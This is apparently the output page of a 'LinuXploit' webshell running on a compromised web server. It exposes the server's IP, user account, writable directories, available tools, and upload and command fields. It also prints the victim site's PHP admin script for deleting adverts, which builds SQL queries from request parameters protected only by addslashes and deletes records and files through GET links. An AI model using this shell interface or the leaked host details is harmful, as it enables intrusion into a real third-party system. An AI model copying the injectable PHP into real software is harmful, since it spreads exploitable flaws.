403Webshell
Server IP : 51.89.169.208  /  Your IP : 3.148.247.210
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/advert/no_images/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yellowleaf/public_html/advert/no_images/index.php
<?php
//error_reporting(E_ALL);
$path  = $_SERVER['DOCUMENT_ROOT'];
include_once $path.'/connect_db.php';
include '../../accesscontrol.php';  
if(isset($_POST['submit'])){

	foreach(addslashes($_POST['ls']) as $listing){
		$aa = explode(" || ", $listing);
		$ls_id = $aa[0];
		$ls_mid = $aa[1];
		// deleting ad
		$q6 = "DELETE FROM ads WHERE adid='{$ls_id}' AND memberid ='{$ls_mid}'";
		$r6 = $connect->query($q6) or die($connect ->error);
		$del_query = "SELECT image, photo_1, photo_2, photo_3, photo_4 FROM ads WHERE  adid='{$ls_id}' AND memberid = '{$ls_mid}' GROUP BY adid";
		$del_result = $connect->query($del_query) or die($connect -> connect_errno);
		$del_row = $del_result->fetch_array();
		$photos_array=array(1 =>$del_row['photo_1'],$del_row['photo_2'],$del_row['photo_3'],$del_row['photo_4']);
		// deleting associating photos to ad
		foreach($photos_array as $photo_key=>$photo_array){
			$file = 'uploads/'.$photo_key.'/'.$photo_array; // name of file
			if (file_exists($file)) {
				@unlink($file);
			}
		}
		$logo_file= 'uploads/logo/'.$del_row['image']; // name of file
		if (file_exists($logo_file)) {
				@unlink($logo_file);
		}
		$message = 'Your Ad has been successfully deleted.';
	}
}

if(addslashes($_GET['del'])=="yes"){
	$adid=addslashes($_GET['adid']);
	$memberid=addslashes($_GET['memberid']);
	// deleting ad
	$q6 = "DELETE FROM ads WHERE adid='{$adid}' AND memberid ='{$memberid}'";
	$r6 = $connect->query($q6) or die($connect->error);
	$del_query = "SELECT image, photo_1, photo_2, photo_3, photo_4 FROM ads WHERE  adid='{$adid}' AND memberid = '{$memberid}' GROUP BY adid";
	$del_result = $connect->query($del_query) or die($connect->error);
	$del_row = $del_result->fetch_array();
	$photos_array=array(1 =>$del_row['photo_1'],$del_row['photo_2'],$del_row['photo_3'],$del_row['photo_4']);

	foreach($photos_array as $photo_key=>$photo_array){
		$file = 'uploads/'.$photo_key.'/'.$photo_array; // name of file
		if (file_exists($file)) {
			@unlink($file);
		}
	}
	// deleting logo
	$logo_file= 'uploads/logo/'.$del_row['image']; // name of file
	if (file_exists($logo_file)) {
			@unlink($logo_file);
	}
	$message = 'Your Ad has been successfully deleted.';
	//header( "refresh:5;url=index.php" );
}

?>



<!-- start: HTML -->
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="/header-footer/global.css">
	<link rel="stylesheet" href="/staff/style_staff.css">
	<title>Staff Area</title>
	<style>
	input#search {
    width: 86%;
    float: left;
    margin: 0 15px 0px 0px;
}
	</style>
</head>
<body>
<?
include '../../staff_header.php';
if($updated==TRUE){
	echo '<div class="successDvBx">ACTIVATED</div>';
}
if($message){
	echo '<div class="successDvBx">'.$message.'</div>';
}
?>
	<!-- start: Table -->
	<div class="table-section">
		<div class="container lg">
			<div class="table-responsive">
				<table class="table">
				<form>
					<?
					$Active = $connect->query("SELECT * FROM ads WHERE active = 1 ")->num_rows;
					$Inactive = $connect->query("SELECT * FROM ads WHERE active = 0 and decline = 0")->num_rows;
					$Declined = $connect->query("SELECT * FROM ads WHERE decline = 1 ")->num_rows;
					$dr = $_SERVER['DOCUMENT_ROOT'].'/members/uploads/logo/';
                    $logo =  scandir($dr);
					foreach($logo as $idd)
					{
						$n = explode('.',$idd);
						if($n[0]){
						  $ids[]=$n[0];
						}
						
					}
					
					?>
					<div class="submit-advert-form-group">
						<a href="/staff/advert/approved/" class="btn btn-yellow">Active (<?=$Active?>)</a>
						<a href="/staff/" class="btn btn-yellow">Inactive (<?=$Inactive?>)</a>
						<a href="/staff/advert/declined/" class="btn btn-yellow">Declined (<?=$Declined?>)</a>
						<a href="/staff/advert/no_images" class="btn btn-yellow">No image Businesses (<?=$Inactive-count($logo)?>)</a>
						
					</div>
					<div class="submit-advert-form-group">
					<input type="text" name="search" id="search" class="form-control"  placeholder="Enter business name" value="<?=addslashes($_GET['search']) ?>">
					<button  class="btn btn-yellow" type="submit">Search
								<svg viewBox="0 0 21 16" fill="none" xmlns="http://www.w3.org/2000/svg">
								<path d="M13.0998 15.5L11.7582 14.1902L17 8.95114H0.588135V7.08004H17L11.727 1.80977L13.0686 0.5L20.5881 8.01559L13.0998 15.5Z"></path>
								</svg>
					</button>
					</div>
					</form>
					<thead>
						<tr>
							<th></th>
							<th>#</th>
							<th>Business Name</th>
							<th>Business Date</th>
							<th>Paid</th>
							<th>Status</th>
							<th colspan="2" class="text-center">Action</th>
						</tr>
					</thead>
					<tbody>
					<?

				$limit = 100;
				$page = addslashes($_GET['page'])?addslashes($_GET['page']):1;
				$offset = ($page-1)*$limit;

				$a = $connect->query("SELECT * FROM ads WHERE active = 0 and decline = 0 ORDER BY adid DESC LIMIT $offset,$limit") or die($connect->error);

				while($b = $a->fetch_array()){
					if(!in_array($b['adid'],$ids))
					{
					$r_ad_name=strtolower($b['companyname']);
					$r_ad_name = preg_replace("/[^A-Za-z 0-9]/", "", $r_ad_name); 
					$r_ad_name=str_replace("  "," ",$r_ad_name);
					$company_name_url=str_replace(" ","-",$r_ad_name);
				?>

				<tr onclick="chbox(<?=$b['adid']?>);" id="tr_<?=$b['adid']?>" <?=(strpos($r_ad_name,'clean') !== false
				? 'class="selected"' : '' )?>>
				<td><input id="inp_<?=$b['adid']?>" type="checkbox" name="ls[]"
						value="<?=$b['adid']?> || <?=$b['memberid']?>"></td>
				<td>
					<?=$b['adid']?>
				</td>
				<td>
					<a href="/pages/<?=$b['adid']?>-<?=$company_name_url?>.html">
						<?=$b['companyname']?>
					</a>
				</td>
				<td>
					<?
						echo date('D jS M Y h:i:s A',$b['postdate']);
					?>
				</td>
				<td>
					<?
						if($b['paid'] > 1){
							echo '<b style="color:orange">Paid</b>';
						}else{
							echo '<b style="color:blue" > Free</b>';
						}
					?>
				</td>
				<td>
				<a href="/staff/advert/?id=<?=$b['adid']?>">
					<?
						if($b['active'] == 1 ){
							echo '<b style="color:green">Approved</b>';
						}elseif($b['decline'] == 1 ){
							echo '<b style="color:red" >Declined</b>';
						}else{
							echo '<b style="color:orange" >Inactive</b>';
						}
					?>
					</a>
				</td>
				<td>
					<a href="/staff/advert/?id=<?=$b['adid']?>">Edit</a>
				</td>
				<td>
					<a onclick="return confirm('Are you sure to delete?')" style="color:red" href="?del=yes&adid=<?=$b['adid']?>&memberid=<?=$b['memberid']?>">Delete</a>
				</td>
			</tr>
				<?}}?>
					</tbody>
				</table>
			</div>
			<div class="table-pagination">
				<a href="?page=<?=$page+1?>">Next Page</a>
			</div>
			<div class="table-action">
				<a href="#" class="btn btn-red">Delete Selected</a>
			</div>
		</div>
	</div>
	<!-- end: Table -->
	
	<script>
		var topbarToggle = document.querySelector('.topbar-menu-toggle')
		var topbarMenu = document.querySelector('.topbar-menu')

		topbarToggle.addEventListener('click', function() {
			topbarMenu.classList.toggle('show')
		})
		
		function chbox(id) {
			document.getElementById('inp_' + id).click()

			if (document.getElementById('inp_' + id).checked) {
				document.getElementById('tr_' + id).classList.add('selected');
			} else {
				document.getElementById('tr_' + id).classList.remove('selected');
			}
		}
	</script>
</body>
</html>
<!-- end: HTML -->

Youez - 2016 - github.com/yon3zu
LinuXploit